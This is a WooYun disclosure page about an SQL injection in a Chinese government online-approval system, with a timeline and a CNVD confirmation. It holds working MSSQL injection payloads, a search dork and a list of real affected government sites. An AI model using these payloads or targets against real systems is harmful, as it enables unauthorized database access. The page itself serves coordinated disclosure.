当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107056

漏洞标题:某政务系统一处通用SQL注入漏洞(附众多政务案例)

相关厂商:邯郸市连邦软件发展有限公司

漏洞作者: 路人甲

提交时间:2015-04-14 15:31

修复时间:2015-07-16 11:02

公开时间:2015-07-16 11:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-14: 细节已通知厂商并且等待厂商处理中
2015-04-17: 厂商已经确认,细节仅向厂商公开
2015-04-20: 细节向第三方安全合作伙伴开放
2015-06-11: 细节向核心白帽子及相关领域专家公开
2015-06-21: 细节向普通白帽子公开
2015-07-01: 细节向实习白帽子公开
2015-07-16: 细节向公众公开

简要描述:

某政务系统一处通用SQL注入漏洞(附众多政务案例)

详细说明:

系统开发厂商:邯郸市连邦软件发展有限公司
系统架构:ASPX+MSSQL
漏洞文件:workplate/xzsp/tjfx/grbjtj/list.aspx
sxmc参数过滤存在问题,导致注入
关键字:inurl:workplate
部分政府案例:
日照市网上审批系统
http://www.rzfwzx.gov.cn/workplate/xzsp/tjfx/grbjtj/list.aspx
保定市网上审批系统
http://www.bdxzfw.cn/workplate/xzsp/tjfx/grbjtj/list.aspx
磁县网上审批系统
http://www.cxxzfwzx.com/workplate/xzsp/tjfx/grbjtj/list.aspx
魏县网上审批系统
http://wxxz.gov.cn/workplate/xzsp/tjfx/grbjtj/list.aspx
邯郸县网上审批系统
http://www.hdxzwzx.com/workplate/xzsp/tjfx/grbjtj/list.aspx
南郊区网上审批系统
http://xz.njqsp.com:8001/workplate/xzsp/tjfx/grbjtj/list.aspx
城区网上审批系统
http://211.142.37.152:81/workplate/xzsp/tjfx/grbjtj/list.aspx
左云县网上审批系统
http://211.142.37.152:88/workplate/xzsp/tjfx/grbjtj/list.aspx
天镇县网上审批系统
http://211.142.37.154:83/workplate/xzsp/tjfx/grbjtj/list.aspx
广灵县网上审批系统
http://211.142.37.152:83/workplate/xzsp/tjfx/grbjtj/list.aspx
新荣区网上审批系统
http://183.203.128.238:82/workplate/xzsp/tjfx/grbjtj/list.aspx
矿区网上审批系统
http://211.142.41.114:82/workplate/xzsp/tjfx/grbjtj/list.aspx
涉县网上审批系统
http://www.hbsxxzfwzx.gov.cn/workplate/xzsp/tjfx/grbjtj/list.aspx
临漳县网上审批系统
http://www.lzxzfwzx.com/workplate/xzsp/tjfx/grbjtj/list.aspx
安新县网上审批系统
http://www.axxzfwzx.com/workplate/xzsp/tjfx/grbjtj/list.aspx
高阳县网上审批系统
http://gyxzfw.net/workplate/xzsp/tjfx/grbjtj/list.aspx
长子县网上审批系统
http://60.220.253.153:81/workplate/xzsp/tjfx/grbjtj/list.aspx
屯留县网上审批系统
http://60.220.240.7/workplate/xzsp/tjfx/grbjtj/list.aspx
浑源县网上审批系统
http://211.142.37.152:85/workplate/xzsp/tjfx/grbjtj/list.aspx
邱县网上审批系统
www.qxxzfwzx.com/workplate/xzsp/tjfx/grbjtj/list.aspx
南郊区网上审批系统
http://xz.njqsp.com:8001/workplate/xzsp/tjfx/grbjtj/list.aspx
大同县网上审批系统
http://211.142.37.152:82/workplate/xzsp/tjfx/grbjtj/list.aspx
等等

漏洞证明:

漏洞验证:
以http://www.rzfwzx.gov.cn/workplate/xzsp/tjfx/grbjtj/list.aspx为例:

---
Place: POST
Parameter: sxmc
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTg0OTU1NTc4OA9kFgICAw9kFgICDw88KwANAQAPFgQeC18
hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCB2QWAmYPZBYSAgEPD2QWBB4Lb25tb3VzZW92ZXIFHnRoaXM
uY2xhc3NOYW1lPSdkdk9uTW91c2VPdmVyJx4Kb25tb3VzZW91dAUWdGhpcy5jbGFzc05hbWU9J2R2Um9
3JxYKZg8PFgIeBFRleHQFATFkZAIBDw8WAh8EBQnmib/or7rku7ZkZAICDw8WAh8EBQEwZGQCAw8PFgI
fBAUBMGRkAgQPDxYCHwQFATBkZAICDw9kFgQfAgUedGhpcy5jbGFzc05hbWU9J2R2T25Nb3VzZU92ZXI
nHwMFF3RoaXMuY2xhc3NOYW1lPSdkdlJvdzInFgpmDw8WAh8EBQEyZGQCAQ8PFgIfBAUJ5Y2z5Yqe5Lu
2ZGQCAg8PFgIfBAUBMGRkAgMPDxYCHwQFATBkZAIEDw8WAh8EBQEwZGQCAw8PZBYEHwIFHnRoaXMuY2x
hc3NOYW1lPSdkdk9uTW91c2VPdmVyJx8DBRZ0aGlzLmNsYXNzTmFtZT0nZHZSb3cnFgpmDw8WAh8EBQE
zZGQCAQ8PFgIfBAUJ6IGU5Yqe5Lu2ZGQCAg8PFgIfBAUBMGRkAgMPDxYCHwQFATBkZAIEDw8WAh8EBQE
wZGQCBA8PZBYEHwIFHnRoaXMuY2xhc3NOYW1lPSdkdk9uTW91c2VPdmVyJx8DBRd0aGlzLmNsYXNzTmF
tZT0nZHZSb3cyJxYKZg8PFgIfBAUBNGRkAgEPDxYCHwQFCeS4iuaKpeS7tmRkAgIPDxYCHwQFATBkZAI
DDw8WAh8EBQEwZGQCBA8PFgIfBAUBMGRkAgUPD2QWBB8CBR50aGlzLmNsYXNzTmFtZT0nZHZPbk1vdXN
lT3ZlcicfAwUWdGhpcy5jbGFzc05hbWU9J2R2Um93JxYKZg8PFgIfBAUBNWRkAgEPDxYCHwQFCeihpeW
KnuS7tmRkAgIPDxYCHwQFATBkZAIDDw8WAh8EBQEwZGQCBA8PFgIfBAUBMGRkAgYPD2QWBB8CBR50aGl
zLmNsYXNzTmFtZT0nZHZPbk1vdXNlT3ZlcicfAwUXdGhpcy5jbGFzc05hbWU9J2R2Um93MicWCmYPDxY
CHwQFATZkZAIBDw8WAh8EBQnnibnlip7ku7ZkZAICDw8WAh8EBQEwZGQCAw8PFgIfBAUBMGRkAgQPDxY
CHwQFATBkZAIHDw9kFgQfAgUedGhpcy5jbGFzc05hbWU9J2R2T25Nb3VzZU92ZXInHwMFFnRoaXMuY2x
hc3NOYW1lPSdkdlJvdycWCmYPDxYCHwQFATdkZAIBDw8WAh8EBQblkIjorqFkZAICDw8WAh8EBQEwZGQ
CAw8PFgIfBAUBMGRkAgQPDxYCHwQFATBkZAIIDw8WAh4HVmlzaWJsZWhkZAIJDw8WAh8FaGQWAmYPZBY
GAgEPDxYCHwQFATFkZAIDDw8WAh8EBQExZGQCDQ8PFgIfBAUBMWRkGAEFBmd2TGlzdA88KwAKAQgCAWR
GZ7HIi9dZwX KnsTLvaQXbd867A==&__VIEWSTATEGENERATOR=D642731C&__EVENTVALIDATION=/w
EWCAKn0bXBCALvn9qDDQKGuYDVAQKm1eh/AvKBgQgCy5yMGwKM54rGBgLWlM bAsEB5BUsQlzemyARJe
p7dQJuaFVP&tbhtml=&sxmc=%' AND 1886=CONVERT(INT,(CHAR(58) CHAR(107) CHAR(100) CH
AR(118) CHAR(58) (SELECT (CASE WHEN (1886=1886) THEN CHAR(49) ELSE CHAR(48) END)
) CHAR(58) CHAR(102) CHAR(98) CHAR(118) CHAR(58))) AND '%'='&iptStartAt=&iptEndA
t=&P_STARTEND=&btn_search=%E6%9F%A5%E6%89%BE
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: __VIEWSTATE=/wEPDwUKMTg0OTU1NTc4OA9kFgICAw9kFgICDw88KwANAQAPFgQeC18
hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCB2QWAmYPZBYSAgEPD2QWBB4Lb25tb3VzZW92ZXIFHnRoaXM
uY2xhc3NOYW1lPSdkdk9uTW91c2VPdmVyJx4Kb25tb3VzZW91dAUWdGhpcy5jbGFzc05hbWU9J2R2Um9
3JxYKZg8PFgIeBFRleHQFATFkZAIBDw8WAh8EBQnmib/or7rku7ZkZAICDw8WAh8EBQEwZGQCAw8PFgI
fBAUBMGRkAgQPDxYCHwQFATBkZAICDw9kFgQfAgUedGhpcy5jbGFzc05hbWU9J2R2T25Nb3VzZU92ZXI
nHwMFF3RoaXMuY2xhc3NOYW1lPSdkdlJvdzInFgpmDw8WAh8EBQEyZGQCAQ8PFgIfBAUJ5Y2z5Yqe5Lu
2ZGQCAg8PFgIfBAUBMGRkAgMPDxYCHwQFATBkZAIEDw8WAh8EBQEwZGQCAw8PZBYEHwIFHnRoaXMuY2x
hc3NOYW1lPSdkdk9uTW91c2VPdmVyJx8DBRZ0aGlzLmNsYXNzTmFtZT0nZHZSb3cnFgpmDw8WAh8EBQE
zZGQCAQ8PFgIfBAUJ6IGU5Yqe5Lu2ZGQCAg8PFgIfBAUBMGRkAgMPDxYCHwQFATBkZAIEDw8WAh8EBQE
wZGQCBA8PZBYEHwIFHnRoaXMuY2xhc3NOYW1lPSdkdk9uTW91c2VPdmVyJx8DBRd0aGlzLmNsYXNzTmF
tZT0nZHZSb3cyJxYKZg8PFgIfBAUBNGRkAgEPDxYCHwQFCeS4iuaKpeS7tmRkAgIPDxYCHwQFATBkZAI
DDw8WAh8EBQEwZGQCBA8PFgIfBAUBMGRkAgUPD2QWBB8CBR50aGlzLmNsYXNzTmFtZT0nZHZPbk1vdXN
lT3ZlcicfAwUWdGhpcy5jbGFzc05hbWU9J2R2Um93JxYKZg8PFgIfBAUBNWRkAgEPDxYCHwQFCeihpeW
KnuS7tmRkAgIPDxYCHwQFATBkZAIDDw8WAh8EBQEwZGQCBA8PFgIfBAUBMGRkAgYPD2QWBB8CBR50aGl
zLmNsYXNzTmFtZT0nZHZPbk1vdXNlT3ZlcicfAwUXdGhpcy5jbGFzc05hbWU9J2R2Um93MicWCmYPDxY
CHwQFATZkZAIBDw8WAh8EBQnnibnlip7ku7ZkZAICDw8WAh8EBQEwZGQCAw8PFgIfBAUBMGRkAgQPDxY
CHwQFATBkZAIHDw9kFgQfAgUedGhpcy5jbGFzc05hbWU9J2R2T25Nb3VzZU92ZXInHwMFFnRoaXMuY2x
hc3NOYW1lPSdkdlJvdycWCmYPDxYCHwQFATdkZAIBDw8WAh8EBQblkIjorqFkZAICDw8WAh8EBQEwZGQ
CAw8PFgIfBAUBMGRkAgQPDxYCHwQFATBkZAIIDw8WAh4HVmlzaWJsZWhkZAIJDw8WAh8FaGQWAmYPZBY
GAgEPDxYCHwQFATFkZAIDDw8WAh8EBQExZGQCDQ8PFgIfBAUBMWRkGAEFBmd2TGlzdA88KwAKAQgCAWR
GZ7HIi9dZwX KnsTLvaQXbd867A==&__VIEWSTATEGENERATOR=D642731C&__EVENTVALIDATION=/w
EWCAKn0bXBCALvn9qDDQKGuYDVAQKm1eh/AvKBgQgCy5yMGwKM54rGBgLWlM bAsEB5BUsQlzemyARJe
p7dQJuaFVP&tbhtml=&sxmc=%' AND 1640=(SELECT COUNT(*) FROM sysusers AS sys1,sysus
ers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,
sysusers AS sys7) AND '%'='&iptStartAt=&iptEndAt=&P_STARTEND=&btn_search=%E6%9F%
A5%E6%89%BE
---


1.png


当前数据库信息:

2.png


其他如上!

修复方案:

如上所述!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-04-17 11:00

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商及对应分中心通报。

最新状态:

暂无

漏洞评价:

评论